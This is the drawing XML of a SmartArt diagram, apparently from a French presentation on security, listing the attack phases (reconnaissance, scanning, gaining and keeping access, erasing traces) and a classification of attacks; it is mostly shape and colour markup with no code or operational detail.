                <a:lumOff val="-3082"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5777628"/>
                <a:satOff val="-8036"/>
                <a:lumOff val="-3082"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-5777628"/>
              <a:satOff val="-8036"/>
              <a:lumOff val="-308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616B5AF-74ED-4CBD-BC09-BE90F2DA0E02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4702398" y="406924"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6302867"/>
                <a:satOff val="-8767"/>
                <a:lumOff val="-3362"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6302867"/>
                <a:satOff val="-8767"/>
                <a:lumOff val="-3362"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6302867"/>
                <a:satOff val="-8767"/>
                <a:lumOff val="-3362"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-6302867"/>
              <a:satOff val="-8767"/>
              <a:lumOff val="-336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A96045E-05E5-4D23-9C29-48543C2F76A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4454325" y="417654"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6828105"/>
                <a:satOff val="-9497"/>
                <a:lumOff val="-3642"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6828105"/>
                <a:satOff val="-9497"/>
                <a:lumOff val="-3642"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-6828105"/>
                <a:satOff val="-9497"/>
                <a:lumOff val="-3642"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-6828105"/>
              <a:satOff val="-9497"/>
              <a:lumOff val="-364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65803F0-B69B-40C8-A4DF-FBA5A0F108DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4454325" y="619991"/>
          <a:ext cx="85070" cy="85070"/>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47D9CC2-722A-4EA3-9D84-F00EF48FDC0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1343889" y="4866631"/>
          <a:ext cx="1832887" cy="49153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7961" tIns="45720" rIns="45720" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1367884" y="4890626"/>
        <a:ext cx="1784897" cy="443544"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9201ED33-A129-4212-96A1-4E879CB5EF2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="835546" y="4385059"/>
          <a:ext cx="850112" cy="849711"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">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A308EC2-7D00-495A-926F-7E2FA0DA3485}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2954284" y="4285679"/>
          <a:ext cx="1832887" cy="491534"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1838336"/>
                <a:satOff val="-2557"/>
                <a:lumOff val="-981"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1838336"/>
                <a:satOff val="-2557"/>
                <a:lumOff val="-981"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1838336"/>
                <a:satOff val="-2557"/>
                <a:lumOff val="-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7961" tIns="45720" rIns="45720" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Scanning</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2978279" y="4309674"/>
        <a:ext cx="1784897" cy="443544"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1346C6A9-DCB3-4C2C-8821-E1BFB21BE577}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2445941" y="3804108"/>
          <a:ext cx="850112" cy="849711"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="50000"/>
            <a:hueOff val="-1847243"/>
            <a:satOff val="-3249"/>
            <a:lumOff val="-418"/>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E0ADA07-14B2-4E21-BB78-1DE7115EEDB9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3827597" y="3446187"/>
          <a:ext cx="1832887" cy="491534"/>
        </a:xfrm>
        <a:prstGeom prst="round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7961" tIns="45720" rIns="45720" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Gain d’accès</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3851592" y="3470182"/>
        <a:ext cx="1784897" cy="443544"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1B5A8A9D-0C96-4699-813B-7D305851761A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3319255" y="2964616"/>
          <a:ext cx="850112" cy="849711"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="50000"/>
            <a:hueOff val="-3694485"/>
            <a:satOff val="-6499"/>
            <a:lumOff val="-836"/>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14BEE09-C11C-4EBA-B1B4-046B6960C882}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4283886" y="2367058"/>
          <a:ext cx="1832887" cy="491534"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5515009"/>
                <a:satOff val="-7671"/>
                <a:lumOff val="-2942"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5515009"/>
                <a:satOff val="-7671"/>
                <a:lumOff val="-2942"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5515009"/>
                <a:satOff val="-7671"/>
                <a:lumOff val="-29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7961" tIns="45720" rIns="45720" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Maintien de l’accès</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4307881" y="2391053"/>
        <a:ext cx="1784897" cy="443544"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B55830F3-AB6C-4653-A6C3-15950AAC2FF3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3775543" y="1885487"/>
          <a:ext cx="850112" cy="849711"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="50000"/>
            <a:hueOff val="-5541728"/>
            <a:satOff val="-9748"/>
            <a:lumOff val="-1254"/>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A3A0261E-2F58-40F7-B4FE-AA29BCAC280D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4537908" y="1268514"/>
          <a:ext cx="1832887" cy="491534"/>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7961" tIns="45720" rIns="45720" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Effacement de traces</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4561903" y="1292509"/>
        <a:ext cx="1784897" cy="443544"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1F6FB46-46CB-49A4-B6DB-FB323E07C58A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4029566" y="786943"/>
          <a:ext cx="850112" cy="849711"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="50000"/>
            <a:hueOff val="-7388970"/>
            <a:satOff val="-12997"/>
            <a:lumOff val="-1672"/>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D546A-71C0-4A10-AC0E-A0ABF8684D83}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="4353259"/>
          <a:ext cx="386863" cy="1105745"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="1105745"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="1105745"/>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6301804" y="4876845"/>
        <a:ext cx="58573" cy="58573"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{56FDB133-67C4-4FA7-BCED-E7B54769BA1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="4353259"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="368581"/>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6317732" y="4524191"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E6197FF0-0467-4B9F-A919-546CDB6A7B14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="3984677"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="368581"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="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6317732" y="4155609"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8EC413DA-39B4-4769-9786-DC6FE75DE4CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="3247513"/>
          <a:ext cx="386863" cy="1105745"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1105745"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="1105745"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="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6301804" y="3771099"/>
        <a:ext cx="58573" cy="58573"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC45DACC-9997-4FA2-A187-A38DE77EBC39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3816477" y="2510349"/>
          <a:ext cx="386863" cy="1842909"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="1842909"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="1842909"/>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fr-FR" sz="600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3962832" y="3384727"/>
        <a:ext cx="94153" cy="94153"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F78E98D0-9AEA-461A-B576-E0E86737B03B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="2141767"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="368581"/>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6317732" y="2312700"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0FB08058-D565-45FF-A46B-1F12D295D485}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="1773185"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="368581"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="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6317732" y="1944118"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{800C0953-6094-4FFF-AE03-4C61A5DA815B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3816477" y="2141767"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="368581"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="0"/>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3996551" y="2312700"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{72D05CAE-349D-4513-ADF1-0877ED89C006}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="667439"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="368581"/>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6317732" y="838372"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C98F520-D0CA-4859-96D6-BB599C518A5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6137659" y="298857"/>
          <a:ext cx="386863" cy="368581"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="368581"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="368581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="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6317732" y="469790"/>
        <a:ext cx="26716" cy="26716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87CD2437-3236-4C80-81F1-F0D7CC02BF5F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3816477" y="667439"/>
          <a:ext cx="386863" cy="1842909"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1842909"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="193431" y="1842909"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="193431" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="386863" y="0"/>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fr-FR" sz="600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3962832" y="1541817"/>
        <a:ext cx="94153" cy="94153"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3639C63A-930B-4ACE-A4B2-A8B3BCE3788D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="1969688" y="2215483"/>
          <a:ext cx="3103848" cy="58973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kern="1200" dirty="0" smtClean="0"/>
            <a:t>Classification des attaques</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1969688" y="2215483"/>
        <a:ext cx="3103848" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60E21240-EDE5-468F-B1CE-20CBA08E568B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4203341" y="372574"/>
          <a:ext cx="1934318" cy="58973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Selon la localisation de l’attaquant</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4203341" y="372574"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{39B833C0-8DAC-4292-B68F-828ACA83B0B2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="3992"/>
          <a:ext cx="1934318" cy="58973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Interne </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="3992"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4E21182C-2A07-43D8-BF24-9FC007E0A7DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="741156"/>
          <a:ext cx="1934318" cy="58973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Externe</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="741156"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{801626B0-1DDD-43D6-82B8-A1A7985583FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4203341" y="1846902"/>
          <a:ext cx="1934318" cy="58973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Selon la nature de l’attaque</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4203341" y="1846902"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{72AE7ECC-E249-47FC-B67B-69C5DD38F331}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="1478320"/>
          <a:ext cx="1934318" cy="58973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Passive </a:t>
          </a:r>
